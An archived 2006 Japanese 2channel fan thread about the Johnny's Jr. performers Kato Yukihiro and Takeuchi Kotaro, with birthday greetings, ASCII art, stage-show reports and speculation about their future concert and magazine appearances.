5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【怒】KT6【泣】

1 ::('<_`<)::2006/04/11(火) 23:07:03
素材はいいのにセンスが欠けている加藤幸宏と武内幸太朗のスレです。
窓所属?と言っても当然のように扱い不透明ですが
それ以上でも以下でもないそれが一番大事なスレです。

モメサ・安置発言はスルー推奨

【短】KT5【長】
http://tv7.2ch.net/test/read.cgi/jr2/1136563903/
【笑】KT4【・・・】
http://tv7.2ch.net/test/read.cgi/jr2/1128795443/
【ずんだ餅18トン】KT3【笹かま19グラム】
http://tv7.2ch.net/test/read.cgi/jr2/1127830525/
【豚ニク】KT2【鳥ガラ】
http://tv7.2ch.net/test/read.cgi/jr2/1125678178/
【きしめん】KT1【そうめん】
http://tv7.2ch.net/test/read.cgi/jr2/1121448054/


2 :( = ゝ = ):2006/04/11(火) 23:11:17
    ∧___,,∧ 
   ( * = ゝ = )
   ┌∪──∪─*・゚゚・*:.。..。.:*・゚お約束*・゚・*:。..。.:*・゚──――┐
   |                                  |
   │ ◇sage進行                          |
   │ ◇扱いが不透明でも泣かない               |   
   │ ◇担決め禁止.                        |
   │ ◇モメサ・安置発言はスルー.                 ∧,,,∧
   │ ◇何事もチャンのように華麗にウナのようにウナく    .('<_`<*)
   |                                 |   ヽ
   └――――――――――――――――――――― と,UU,,,O〜


3 :ユーが名無しネ:2006/04/11(火) 23:20:36
イマイチ納得しかねるが乙

4 :ユーが名無しネ:2006/04/11(火) 23:22:41
>1
乙!
チャンの両脇にあるものは何だ?

5 :ユーが名無しネ:2006/04/11(火) 23:22:59
>1-2
ウナチャン乙

>3
カリカリすんな

6 :ユーが名無しネ:2006/04/11(火) 23:25:31
>1
乙彼サマー

7 :ユーが名無しネ:2006/04/11(火) 23:26:53
>1お( = ゝ=)人('<_`<)つ

前スレ>998と>1000チネ

8 :ユーが名無しネ:2006/04/11(火) 23:28:54
(  = ゝ = )オツナンジャナイノ!?


9 :ユーが名無しネ:2006/04/11(火) 23:42:31
いつも思うんだが2のAAキャワス

10 :ユーが名無しネ:2006/04/12(水) 00:13:04
ウナの誕生日が迫っている件

11 :ユーが名無しネ:2006/04/12(水) 03:03:24
乙!
ウナバースデーは何が起こるのだろうか?興味深々

12 :ユーが名無しネ:2006/04/12(水) 04:28:52
>1


13 :ユーが名無しネ:2006/04/12(水) 15:54:20
>1

その天麩羅【髪型注意】【服装注意】用だったんだが
まいいけど

14 :ユーが名無しネ:2006/04/12(水) 18:49:45
だろ!天麩羅とスレタイがあってないと思ってた
ところでこのスレタイの意味がわからんのだが

15 :ユーが名無しネ:2006/04/12(水) 22:37:54
自分もよくわからない
けどあんまカリカリするなよ

16 :ユーが名無しネ:2006/04/12(水) 22:56:48
蟻にチャンの厨スレが出来てるな

17 :ユーが名無しネ:2006/04/12(水) 23:09:01
>15
人に気遣ったつもりが逆にイライラさせるタイプだろ

18 :ユーが名無しネ:2006/04/12(水) 23:40:08
あらち会報キタコレ

19 :ユーが名無しネ:2006/04/12(水) 23:52:50
じゃあと980レスあまりをさっさと埋めて新しいの立てようよ

>16
他スレ不干渉とはいえ凄いよなあれ
出来た日に覗いたが緑がイパーイで安置スレなのかとオモタ

20 :ユーが名無しネ:2006/04/13(木) 01:04:59
>13
そんなの最初にテンプレ作ったおまいしかわからないだろ

皆もちつけ

21 :ユーが名無しネ:2006/04/13(木) 01:05:56
>19
むやみに埋める必要はないだろ
マターリ行こうぜ

22 :ユーが名無しネ:2006/04/13(木) 01:12:25
あらち会報早くミタス

23 :ユーが名無しネ:2006/04/13(木) 01:28:06
>20
あの流れでいけばちゃんと分かると思うんだが
スレ立て時は人稲だったのに文句言うヤシは沢山いるんだな

24 :19:2006/04/13(木) 01:46:45
じゃ文句あるヤシは三倍速で
文句ないヤシはマターリ行こうよ
自分はスレ立て出来ないから立ててもらえれば何でも有難い

25 :ユーが名無しネ:2006/04/13(木) 08:21:22
自分はこのスレタイ紺で泣きたいのを我慢して恐い顔のウナと
泣いちゃって鼻が真っ赤のチャンを思い出してホッコリするけど

26 :ユーが名無しネ:2006/04/13(木) 09:04:17
自分紺のオーラス行ってないからそんなのわからん
恐い顔なのになぜ 怒 の文字なんだ

27 :ユーが名無しネ:2006/04/13(木) 09:33:00
オマイ文句ばっかり言ってモメサなのか?
文句があるなら自分でスレ立てしろ
出来ないならグダグダ言うな

28 :ユーが名無しネ:2006/04/13(木) 12:02:11
そんな事言って
勝手に立てたら文句言うくせに

29 :ユーが名無しネ:2006/04/13(木) 12:57:33
城スレでも話題になってるが
あのスタント兄さんチャンに髪型似てるよな

30 :ユーが名無しネ:2006/04/13(木) 13:04:09
1が悪いでFA

31 :ユーが名無しネ:2006/04/13(木) 13:07:03
筋肉モリモリなチャン(w

32 :ユーが名無しネ:2006/04/13(木) 13:20:15
城スレであんなにチャンの名前が出る日が来るなんて(つД`)(w

33 :ユーが名無しネ:2006/04/13(木) 22:56:56
( * = ゝ = ) オレダッテワダイニナリタインジャナイノ?!

34 :ユーが名無しネ:2006/04/14(金) 00:21:01
しうまいからカツンにつくと思う人

35 :ユーが名無しネ:2006/04/14(金) 00:33:17
今週末から投入されてしうまいは外されるとかもあり得る

36 :ユーが名無しネ:2006/04/14(金) 00:46:19
しうまいの可能性は捨て切れんが今週末はないんジャマイカ

37 :ユーが名無しネ:2006/04/14(金) 09:56:35
さすがに今週末はないだろ
期間的に見て石鹸牛舌はナシ
カツンしうまいは出たらラッキーくらいじゃ?

38 :ユーが名無しネ:2006/04/14(金) 10:30:16
石鹸牛舌は期間的には出れそうジャマイカ?
振り入ってる曲ばかりだし
ただ無所と衝撃組丸々入れ換えたあたりが10人のままで
終わりそうなふいんき(ryだけど

39 :ユーが名無しネ:2006/04/14(金) 10:46:20
二人のナンデナンデ見たいのに残念

40 :ユーが名無しネ:2006/04/14(金) 11:17:37
城終わってすぐ牛舌だよな?
チト大変そうだし休んでホスィ

41 :ユーが名無しネ:2006/04/14(金) 14:41:50
あらち会報のチャン骨!って感じだな

42 :ユーが名無しネ:2006/04/15(土) 22:13:01
イリュージョンの仮面マントに窓いる?
それぽいの見つけたんだけど断定できね

43 :ユーが名無しネ:2006/04/16(日) 01:17:55



      ∩─∩、
    / ●  ● ! 
.   彡  (_●_) ミ
.  ⊂` (・゚ρ゚):⊃
   `ヽ _,)  ノ   クマ
      `'-'´   クマ


44 :ユーが名無しネ:2006/04/16(日) 21:42:59
ヤパーリ掲示板窓こなそうだよな
ちょっぴり期待してたのに

45 :ユーが名無しネ:2006/04/16(日) 22:53:09
4人まとめて1つでもいいのにね

46 :ユーが名無しネ:2006/04/16(日) 23:27:40
ホント
四人まとめてでいいのにな

47 :ユーが名無しネ:2006/04/17(月) 00:27:17
パンフと挨拶での扱いの方がむしろ謎な気がしてきた今日この頃

48 :ユーが名無しネ:2006/04/17(月) 00:50:08
厨っぽいけど蛇網に4人まとめてでいいからヨロってメールしてみた
はいはい必死ですよ

49 :ユーが名無しネ:2006/04/17(月) 00:52:51
蛇網じゃなくて蛇波だ
逝ってきます探さないでくださいorz

50 :ユーが名無しネ:2006/04/17(月) 00:56:30
必死な想いが伝わってるくるよ(w

51 :ユーが名無しネ:2006/04/17(月) 01:53:08
オマイももちつけ(w
自分もヨロメール出そうかな
ヤシらにもヲタが居るってアピる意味でも

52 :ユーが名無しネ:2006/04/17(月) 02:13:54
気が付かなかった(w
たまにはいいかもなそういうのも

53 :ユーが名無しネ:2006/04/17(月) 17:53:23
自演?

54 :ユーが名無しネ:2006/04/17(月) 20:44:47
自分もメールしてみるノシ

55 :ユーが名無しネ:2006/04/17(月) 23:48:09
自分もメールするノシ
その他問い合わせでいいんだよね?

56 :ユーが名無しネ:2006/04/17(月) 23:58:43
その他問い合わせで件名をリクエストにして送ってみた

57 :ユーが名無しネ:2006/04/18(火) 00:00:26
ウナ誕生日オメス!!

58 :ユーが名無しネ:2006/04/18(火) 00:00:51
ウナ19歳オメ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*
チャン生日に続きウナ生日も生で祝えるのがウレスィ
城に行ってきますよノシ

59 :ユーが名無しネ:2006/04/18(火) 00:06:52
ウナ誕生日オメ!
19歳も良い年になるといいな

60 :ユーが名無しネ:2006/04/18(火) 00:12:36
ウナオメ!!
自分も今日城行ってくるノシ
城も残り僅かだがガンガレ!

61 :ユーが名無しネ:2006/04/18(火) 00:12:42
ウナ19歳ハピオメ!!何処に居ても誰の後ろでも応援するぞ!イイ一年にしろよ!

62 :ユーが名無しネ:2006/04/18(火) 00:16:48
ウナハピバデ
夏も誰かの紺でオマイを見られることを祈ってるよ
がんがれ

63 :ユーが名無しネ:2006/04/18(火) 00:17:48
ウナお誕生日オメオメ!
もう19歳かよ早いな
ステキングな一年にしちゃいなよ

64 :ユーが名無しネ:2006/04/18(火) 00:24:03
ウナ誕生日オメ!
19歳に見えないウナが大スチだ


65 :ユーが名無しネ:2006/04/18(火) 00:41:59
ウナ生日オメ!
生まれてくれた事に感謝だょ
19才のウナがいっぱい見れますよーに
ついでにハタチも祝いたいからヨロ

66 :ユーが名無しネ:2006/04/18(火) 00:56:14
ウナ19歳オメ!今年もウナらしく突っ走っていってくれよ

67 :ユーが名無しネ:2006/04/18(火) 01:09:42
ものすごく久々にスレを覗いたら偶然誕生日だった
誕生日憶えてない他担でスマンが
ウナオメ

68 :ユーが名無しネ:2006/04/18(火) 01:27:41
ウナオメ!
明日はいい日になるといいな
明日行く姐さん自分の分も祝ってきてくれ(w

69 :ユーが名無しネ:2006/04/18(火) 01:27:47
踊れるほうのカトー君オメジャン!

70 :ユーが名無しネ:2006/04/18(火) 01:47:41
ウナオメ!
明日は城行けないけど電波だけ飛ばしとく
オメ!!!

71 :ユーが名無しネ:2006/04/18(火) 05:40:53
ウナ誕生日オメ!
早いねもう19歳なんだな
ウナ更にステチな男前になってね
今日は城でお祝いしてくるノシ

72 :ユーが名無しネ:2006/04/18(火) 06:06:30
ウナオメ!19歳おめでとう
今年も一年充実した年にしてくれよ

73 :ユーが名無しネ:2006/04/18(火) 07:22:05
ウナオメ!
アフォなのにダンスがウマーなオマイがスチだ!
自分も今日は仕事帰りに城にかけつけるぞ
ここの姐さん達何人くらいいるんだろうな

74 :ユーが名無しネ:2006/04/18(火) 08:50:52
4月18日はカラアゲの日ですよみなさん
ウナオメ!ウナママンに感謝するよ

75 :ユーが名無しネ:2006/04/18(火) 08:56:43
ちょさりげなく笛もお祝いに(w

76 :*・゜゚・* Happy birthday *・゜゚・*:2006/04/18(火) 10:10:32
ヽ,.ゞ:,  ,ヾゞヾ;ゞゞ\ヾゞ:  ヾヾ゛ ゞ.ヾゞヾヽ,.ゞ:,,ヾゞヾ;ゞゞノヾゞ:  ヾゞ;ゞゞヾゞ;ゞ
,.ゞ :,,ヾゞヾ;ゞゞノヾゞ:ヾヾ  ゛ゞ.ヾ     ゞヾゞ;ゞゞヾ  ゞ;ゞ      `
ゞ:ヾゞ゛;ヾ;ゞ  ,',;:ゞヾゞ;ゞヾ.:     ヾ:ヾゞヾ., .ゞヾゞ;ゞ   ヾ;ゞゞ;ゞ `  ``
,,ゞ.ヾ\\ ゞヾ:ゞヾ ノノ ゞヾ .  ゞヾ ゞヾ  .ゞ;ゞヾ;ゞゞ;ゞ ヾ;ゞゞ;ゞ    `
ゞヾ ,,.ゞヾ::ゞヾゞ:ヾ ゞ:.y.ノヾゞ..ヾ .ゞ,'ヾ  ゞヾゞ ;ゞヽ,.ゞ:,,ヾゞヾ;ゞゞ;ゞゞヾゞ;    `
ゞヾゞ;ゞゞヾゞ;ゞiiiiii;;;;::::: イ.ヾゞ, .,;  ゞヾゞ___// ;ゞ   ゞヾゞ;ゞ  ヾ;ゞゞ;ゞ    `
ゞヾ   ゞ;ゞ iiiiii;;;;;::::: :)_/ヽ,.ゞ:,,ヾゞヾゞ__;::/      ゞヾゞ;ゞヾ;ゞゞ;ゞ
  ゞヾゞ;ゞ   iiiiii;;;;::::: :|;:/    ヾ;ゞゞ;ゞ   ヾゞ Best wishes on your 19th birthday !  `
ヾ;ゞゞヾ;ゞゞ |iiiiii;;;;::: : |:/ ヾゞ        `        always wish for your happiness !
  ヾ    |iiiii;;;;;::::: ::|       `   `             `
  `    |iiiiiiii;;;;;;::: :| `      `            `    ` ,
 `     ,|i;iiiiiii;;;;;;::: :| `    `         `     `      `  `   `
     `  |ii,iiiiiii;;;;;;::: ::| `    ,
      ,|iiii;iiii;;;;:;_ _: :|        `        `        `, `    `
 `    |iiiiiii;;;;;;((,,,)::.::|   `       ` ,
  `   |iiiiiiii;;ii;;;;;;~~~:|∧___,,∧      ∧,,,∧     `             `
,       |iiiiii;iii;;;;i;;:: ::::::( * = ゝ = )  `  ('<_`<*)             ,
   `  |iii;;iiiii;::;:;;;;::: :::| | つ旦 とヽ `   ` |   ヽ
,,.,.. ,..M|M|iMiiii;;ii:i;;:;i:i;;::; (  つ.,..,...つ,.,.. ,...... ,. と,UU,,,O〜 ,,,.,..,.... ,,,.. ,.... ,,,.,.. ,.... ,,,.,...,.. .. ,.... ,,,.,.. ,.... ,,,.,
,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,,.,.. ,.... ,,,.. ,,,



77 :ユーが名無しネ:2006/04/18(火) 10:35:11
ウナ、ハピオメ
君がいてくれたお陰で、楽しい日々が送れます。トン

78 :ユーが名無しネ:2006/04/18(火) 11:57:47
>77
カラアゲ食べながら暫くロムってて下され

79 :ユーが名無しネ:2006/04/18(火) 12:10:53
笛に今気付いた
ワロス

80 :ユーが名無しネ:2006/04/18(火) 12:51:07
>56
d
メールしてみましたノシ

81 :ユーが名無しネ:2006/04/18(火) 15:57:20
ウナオメ!
今日の夕御飯はカラアゲにします

82 :ユーが名無しネ:2006/04/18(火) 16:24:54
ウナ19才オメオメ!
二人のハタチも祝えるといいな

83 :ユーが名無しネ:2006/04/18(火) 16:55:52
今日の昼にカラアゲ食べて心の中でハピバしたよ
今年1年も元気で活躍してくれ

84 :ユーが名無しネ:2006/04/18(火) 17:27:14
今日は着物とスーツの客いっぱいだけど
ウナ生日だから正装じゃなきゃダメなの?

85 :ユーが名無しネ:2006/04/18(火) 17:55:42
ナタリマエ
正装+献上用カラアゲがデフォ(w

86 :ユーが名無しネ:2006/04/18(火) 19:33:31
布片付けるウナが黄色い布かぶってた(w
チャンはそのままウナごとはけさせてた
最初とか和太鼓叩いてる時とかウナは時々微笑んでた

今日って土用の丑の日なんだね
ウナギ食えよウナ

87 :ユーが名無しネ:2006/04/18(火) 20:41:21
ウナ誕生日はご機嫌なのウナ

88 :ユーが名無しネ:2006/04/18(火) 21:37:44
姐さん達ウナが…

89 :ユーが名無しネ:2006/04/18(火) 21:48:55
>88
何?

おとといぶりに見たけどウナはその時よりずいぶんご機嫌だったよ
窓挨拶で刀振り回した後もプッて微笑んでたし

90 :ユーが名無しネ:2006/04/18(火) 22:10:59
>88
どうした?

自分週末入るんだけどウナ生日のご機嫌が続きますように

91 :ユーが名無しネ:2006/04/18(火) 22:11:36
86だが
布を被ったっていうか頭からすっぽりかかってたって感じ

チャンは窓挨拶の後刀を腰にしまいながら後ろに行ったとき
チャンはTJと何度か笑ってた

92 :ユーが名無しネ:2006/04/18(火) 22:51:46
レポd!
刀…?

93 :ユーが名無しネ:2006/04/18(火) 23:01:06
今日の昼迷ったあげくに体が候補になかったカラアゲ定食のボタン押してたのはウナ生日だったからか

94 :ユーが名無しネ:2006/04/18(火) 23:22:21
>92
カテコの窓紹介は青のノースリ衣装で刀を振り回してる

95 :ユーが名無しネ:2006/04/18(火) 23:53:00
幕間にカラアゲ弁当食ってた自分が来ましたよ
ゑ様とペアの金のサラサラの時ゑ様とウナ顔合わせてニヤニヤ
太鼓叩く時もたまにご機嫌ダタ
布ヒラヒラはいつもどおり必死
時々チャンやダンサーさんとアイコンタクト
布かぶってたのはワロス
今日皆に祝ってもらえたかな
ガイシュツネタ有りでスマソ

96 :ユーが名無しネ:2006/04/19(水) 00:23:10
ちょヤフオク

97 :ユーが名無しネ:2006/04/19(水) 09:26:29
会場外の蜜写屋のオサーンがこの子よく売れるなぁとウナのこと言っていた
近くのヲタもすでに買ったふうだったし
みんな記念買いでもしたのか?

98 :ユーが名無しネ:2006/04/19(水) 12:58:21
アクゴが窓に触れてくれてウレシス

99 :ユーが名無しネ:2006/04/20(木) 00:11:40
楽屋で窓の4人が何をやってるのか禿しく知りたいが
知る術はなさげだなorz

100 :ユーが名無しネ:2006/04/20(木) 00:17:59
自分も気になる
ウナチャンは足の楽屋にもお邪魔してそうなのにな


101 :ユーが名無しネ:2006/04/20(木) 00:35:37
マジレスするとウナチャンは足よりも海老氏の方が仲良(ry

102 :ユーが名無しネ:2006/04/20(木) 00:41:06
今日やっと城で好きやねん見られた
チャンしかよく見えなかったんだが
やっぱ好きやねーんの投げチューする振りが
いつものチャンの投げチューそのままで目を細めた表情しててワロス(w
ほんでもってそんでのとこはニコリともせず真顔で踊ってますた
次回はウナも見える席だといいんだが

103 :ユーが名無しネ:2006/04/20(木) 00:50:17
はいはいパンパース

104 :ユーが名無しネ:2006/04/20(木) 00:50:27
>102
レポd!
想像しただけでテラモエス
好きやねんのウナチャン立ち位置って何処なんだ?


105 :ユーが名無しネ:2006/04/20(木) 00:52:43
好きやねん自分はウナしか見てないが
ウナは行進みたいなフリがヘタクソな木ガス
ちなみにウナはわりと前の方にいる


106 :ユーが名無しネ:2006/04/20(木) 00:56:15
書き忘れ
ウナは下手寄り
好きやねん笑顔でやってほしいのに真顔

107 :ユーが名無しネ:2006/04/20(木) 00:59:42
真顔と言うより真顔と笑顔の間くらいジャネ?

108 :ユーが名無しネ:2006/04/20(木) 11:19:56
すきやねんってか関西メドレーの立ち位置は最下手
下手からチャンウナ枝でTJだけ離れた所にいる

109 :ユーが名無しネ:2006/04/20(木) 11:27:17
d!

110 :ユーが名無しネ:2006/04/20(木) 13:06:09



111 :ユーが名無しネ:2006/04/20(木) 20:10:38
あらち決まったな
ウナチャンどうなるんだろうな

112 :ユーが名無しネ:2006/04/20(木) 21:40:41
このまま別な可能性もありそうだが
どうなるんだろうな

113 :ユーが名無しネ:2006/04/20(木) 22:42:51
どうなるか悩むより言霊言霊
でも押さえるとこは押さえとけよ

114 :ユーが名無しネ:2006/04/21(金) 02:38:56
夏も足と一緒がいい(言霊)

115 :ユーが名無しネ:2006/04/21(金) 03:17:05
それは多分スレチと呼ばれる運命では…

116 :ユーが名無しネ:2006/04/21(金) 08:11:59
>114氏ね 足はウザーな豚がいるからいやだ


117 :ユーが名無しネ:2006/04/21(金) 08:37:40
足と一緒はウナチャン的にメリット茄子かと

118 :ユーが名無しネ:2006/04/21(金) 09:57:18
どこと一緒にいてもメリットなし
ただ海老足のほうがおいしい仕事が多い
地上派に乗るのは大きい

119 :ユーが名無しネ:2006/04/21(金) 13:42:27
足と一緒だと端に追いやられる

120 :ユーが名無しネ:2006/04/21(金) 13:54:38
今みたく四人が一番いい
もしくは二人でもいいよ
臨機応変に動ける人数の方が前に出れるし

121 :ユーが名無しネ:2006/04/21(金) 14:53:34
えーと
このスレの主旨何だっけ

122 :ユーが名無しネ:2006/04/21(金) 15:43:59
出れるならどこだっていい
何も望んでない

123 :ユーが名無しネ:2006/04/21(金) 15:57:23
このスレに主旨なんてナス

124 :ユーが名無しネ:2006/04/21(金) 16:49:32
本人が楽しそうならなんでもいい
チケが取れやすいならどこでもいい

125 :ユーが名無しネ:2006/04/21(金) 17:09:02
何に対しても嫌だ嫌だ言ってるヤシはただの煽りだろ
地上波露出があってコンの出番が多ければ誰と一緒でもイイ

126 :ユーが名無しネ:2006/04/21(金) 17:21:49
>地上波露出があってコンの出番が多ければ
これが一番難しい

127 :ユーが名無しネ:2006/04/21(金) 17:41:27
今日のMステは出るだろうか

128 :ユーが名無しネ:2006/04/21(金) 17:48:52
海老足と一緒なら粕扱いされるから出なくていい
何時間も拘束されてオンエアで見切れなんてカワイソス
ゆっくり休んでほしい


129 :ユーが名無しネ:2006/04/21(金) 18:02:25
>128
厨は出ていってくれ

130 :ユーが名無しネ:2006/04/21(金) 18:15:07
やっぱり本人達楽しんでくれたらそれでいいよな
扱いヨカタらラッキー程度に思っておけばいいし

131 :ユーが名無しネ:2006/04/21(金) 18:21:03
海老氏足どうこう言ってるのは深山か窓スレからの客

132 :ユーが名無しネ:2006/04/21(金) 20:17:57
厨というよりばあ(ry


133 :ユーが名無しネ:2006/04/21(金) 22:07:42
早く窓なくなればいいのに
無所ならMステも出られる
変にユニくくられてるから

134 :ユーが名無しネ:2006/04/21(金) 23:43:43
KT担ナリの窓安置乙

135 :ユーが名無しネ:2006/04/22(土) 00:22:03
なんか妙に納得
ユニくくりって邪魔だな

136 :ユーが名無しネ:2006/04/22(土) 00:37:36
窓は好きだがユニ括りがマンドイのも事実

137 :ユーが名無しネ:2006/04/22(土) 01:08:35
フレッシュでもない限りユニじゃないと雑誌に載れないのも事実

138 :ユーが名無しネ:2006/04/22(土) 01:23:45
少人数ユニが一番

139 :ユーが名無しネ:2006/04/22(土) 01:54:31
カツンしうまいつくかな

140 :ユーが名無しネ:2006/04/22(土) 10:52:09
出てくれるといいな
仕事はあるに越したことはない

141 :ユーが名無しネ:2006/04/22(土) 14:40:58
カツンはないだろ
タモステもヤパーリでなかったし

142 :ユーが名無しネ:2006/04/22(土) 15:31:01
そんなの誰にも分からない

143 :ユーが名無しネ:2006/04/22(土) 17:07:57
カツンはドームだけじゃないか

144 :ユーが名無しネ:2006/04/22(土) 18:00:24
ドーム出るならついでに出ればいいのに
もったいナス

145 :ユーが名無しネ:2006/04/22(土) 18:03:11
ドームのこと忘れてた

146 :ユーが名無しネ:2006/04/23(日) 15:37:26
昨日の夜公演ショータイム
挨拶窓並びでTJと枝が振りを揃えて踊ってるのを
チャンが後ろから微笑みながら見守ってた
TJがはしゃぐのにウケてた
保父さんみたいダタ
ウナはご機嫌が芳しくなかったような
始終疾走に出れそうな鋭い目付きでそれはそれでモヘ

147 :ユーが名無しネ:2006/04/23(日) 21:43:32
今日の昼窓挨拶の後上手に移動したら
ウナ枝TJチャンの順番に並んでエグザイルみたいにぐるぐるやってた
最初にウナが一人でやってて枝はスルーしてたんだけどそのうち全員でやってた
自分の席からセットが邪魔でチャンが見えなかったんだけどやってたはず

布をパタパタしながらウナは汗ぬぐったりアクビを1回してたから体調悪いのかと思ったけど
美茄子の途中でスイッチが入ったっぽい
人差し指を前横にチョンチョンやる振りが笑顔で激しかった

好きやねんのチャンの投げチューやっと見れた(w

148 :ユーが名無しネ:2006/04/23(日) 22:34:29
今日の夜の部は挨拶の後ウナは1人で前むいてはしゃいで拍手してたんだが
その後ろでチャン枝TJは楽しそうに飛び跳ねながらハイタッチしてたぞ
挨拶のときはウナ刀がうまくはまらなくて
禿笑顔ダタ

149 :ユーが名無しネ:2006/04/23(日) 22:38:45
>148
昼もウナの刀はうまくはまらなくてやっぱり笑ってた

150 :ユーが名無しネ:2006/04/23(日) 22:48:08
>147
エグザイル禿ミタス
挨拶の時あの位置場所によっては見にくいよな

枝がいつだって歌を口ずさんでてキャワ

151 :ユーが名無しネ:2006/04/23(日) 23:48:28
もーみんなキャワで身悶える

152 :ユーが名無しネ:2006/04/24(月) 00:33:34
ほんと四人がキャワでホッコリする
楽はマジ泣きしそうだ

153 :ユーが名無しネ:2006/04/25(火) 09:57:50
今日で終わりだな
長いようであっという間だったな

154 :ユーが名無しネ:2006/04/25(火) 15:00:05
長いと思ってたけどあっという間だ
今日はチャン泣くかな(w

155 :ユーが名無しネ:2006/04/25(火) 16:18:05
楽に入る姐さん
ジヌンの分まで拍手してきて

156 :ユーが名無しネ:2006/04/25(火) 17:20:41
まかせろ
オマイの分までウナチャンと泣いてくる

157 :ユーが名無しネ:2006/04/25(火) 17:37:06
>154
いい加減浮いてることに気付けよ

158 :ユーが名無しネ:2006/04/25(火) 17:38:43
155ダタ スマソ

159 :ユーが名無しネ:2006/04/25(火) 19:26:26
>157
何がおかしいの?
(wの事ならズニア板には全角半角の決まりはないよ

160 :ユーが名無しネ:2006/04/25(火) 19:45:49
スマソ雑談厨の事ですね

161 :ユーが名無しネ:2006/04/25(火) 20:59:39
ウナチャン泣くかな

162 :ユーが名無しネ:2006/04/25(火) 23:27:31
楽自体が泣くような感じじゃなくて
笑顔でお別れ的な感じだったから誰も泣かなかった
ただチャンと枝は鼻を真っ赤にしてた(w
四人とも禿テンソン高く騒いでたぞ

163 :ユーが名無しネ:2006/04/25(火) 23:32:07
>162
レポd
ウナチャン火事後復活した時もエピで泣きそうになってたのにな
ホントに2ヶ月乙でした

滝の白糸後に防水シートをいつも大慌てで畳みながら楽しそうな窓テラモエスだた

164 :ユーが名無しネ:2006/04/25(火) 23:37:43
こんなにしっかり舞台出たのは四人とも初めてだよな
いい経験が出来て良かったと思う

165 :ユーが名無しネ:2006/04/25(火) 23:46:10
最近いい仕事バカーリだな
アフォ古紙楽入ったのウラヤマシス

166 :ユーが名無しネ:2006/04/25(火) 23:57:50
カツンは出ないよな…
このまま浮上してくれればいいんだが

167 :ユーが名無しネ:2006/04/26(水) 00:35:16
>164
みんな楽しそうだったしな
最後の出演者紹介の輝かしい笑顔は忘れない
4人全員ちゃんと顔見ておけばよかった

168 :ユーが名無しネ:2006/04/26(水) 00:39:03
白虎隊の時の衣装がテラスキだった
髪型ともなんか合ってたし

169 :ユーが名無しネ:2006/04/26(水) 00:41:14
白虎隊チャンは見付けやすかったよな
自分は布ヒラヒラの衣裳もスキだた

170 :ユーが名無しネ:2006/04/26(水) 00:49:19
水芸始まる時の障子運びの山寺みたいな衣装がキャワ

171 :ユーが名無しネ:2006/04/26(水) 01:37:15
自分は四人で動く事によってお兄さんぽくなる
ウナチャンにテラモエスだった
衣装もハズレがなかったし

172 :ユーが名無しネ:2006/04/26(水) 01:46:00
布ヒラヒラで前楽も千秋楽も微妙な駆け引きを楽しむウナチャソテラモエス

173 :ユーが名無しネ:2006/04/28(金) 15:25:12
石鹸紺にウナチャンが出るのか気になる

174 :ユーが名無しネ:2006/04/28(金) 16:31:05
10人にこだわってるみたいだし出ないんじゃない?

175 :ユーが名無しネ:2006/04/29(土) 11:59:52
石鹸出ないね
淋しい

176 :ユーが名無しネ:2006/04/29(土) 22:09:09
>171
ウナと枝はタメなんだけどな


177 :ユーが名無しネ:2006/04/29(土) 22:58:09
でも枝のが下に見えないか?(w
兄弟みたいでキャワス

178 :ユーが名無しネ:2006/04/30(日) 01:09:14
枝体も小さいしな

少倉プレミアム楽しみだ

179 :ユーが名無しネ:2006/04/30(日) 07:56:58
魚貝に居る訳でも無いんだよな?

180 :ユーが名無しネ:2006/04/30(日) 12:15:42
久しぶりのオフを満喫してるよ

181 :ユーが名無しネ:2006/04/30(日) 12:16:12
久しぶりのオフを満喫してるよ

182 :ユーが名無しネ:2006/04/30(日) 12:32:22
次はプレミアムかな

183 :ユーが名無しネ:2006/04/30(日) 14:15:17
だといいな

184 :ユーが名無しネ:2006/05/02(火) 00:05:07
そうかな

185 :ユーが名無しネ:2006/05/02(火) 00:16:09
そうだよ

186 :ユーが名無しネ:2006/05/02(火) 09:52:43
しかし干菓子バック=PZなんだろうか
可能性は無くはないよな

187 :ユーが名無しネ:2006/05/02(火) 15:53:03
PZメンバーは魔舞台オーラスあたりで発表される事が多いような

188 :ユーが名無しネ:2006/05/02(火) 17:17:06
さて明日から仕事か
明日からもオフかどうか

189 :ユーが名無しネ:2006/05/02(火) 20:54:29
一応明日はウチワ持っていこう
期待はできないが

190 :ユーが名無しネ:2006/05/02(火) 23:25:42
もしいたらレポヨロ


191 :ユーが名無しネ:2006/05/03(水) 03:42:21
ここ数日はオフじゃないんだが
明日からはオフだな

192 :ユーが名無しネ:2006/05/03(水) 09:15:19
プレミアムおつー
ということで


193 :ユーが名無しネ:2006/05/03(水) 09:42:00
嫌なヤシらだな

194 :ユーが名無しネ:2006/05/03(水) 12:18:43
PZ当たってる場合ってその日の同一名義でのあらち振込NGかな

195 :ユーが名無しネ:2006/05/03(水) 20:02:58
当然不在だったが付かなくても別に…という感じ

196 :ユーが名無しネ:2006/05/03(水) 21:08:22
やっぱり無所の方がおいしいのか

197 :ユーが名無しネ:2006/05/03(水) 23:31:31
無所なら呼ばれないだけかと

198 :ユーが名無しネ:2006/05/04(木) 02:13:42
もしかして
また傘を回しに行ったり…?

199 :ユーが名無しネ:2006/05/04(木) 15:50:26
傘回しを見る為にチケ手配するのはチョト

200 :ユーが名無しネ:2006/05/04(木) 19:54:10
無所で呼ばれてた頃が懐かしい

201 :ユーが名無しネ:2006/05/05(金) 00:01:12
夏のあらちワクテカ
カツン紺は見に来ないのかな

202 :ユーが名無しネ:2006/05/05(金) 01:01:56
懐かしいなんて随分だな
窓になってやっと半年なのに

203 :ユーが名無しネ:2006/05/05(金) 01:36:42
連載wktk

204 :ユーが名無しネ:2006/05/05(金) 09:39:11
>203
何のことだ?

205 :ユーが名無しネ:2006/05/05(金) 09:46:11
雑誌で一月に1人窓から紹介されるのが連載
14ヶ月かかるからウナチャンがいつになるかはわからんが
ちなみに今月はアフォモだ

206 :ユーが名無しネ:2006/05/06(土) 01:07:13
>205
d
楽しみだな

207 :ユーが名無しネ:2006/05/07(日) 19:19:58
D誌連載始まったってことは
毎月窓を出してくれるんだろうか

208 :ユーが名無しネ:2006/05/07(日) 19:57:36
ウナチャンも載れますように

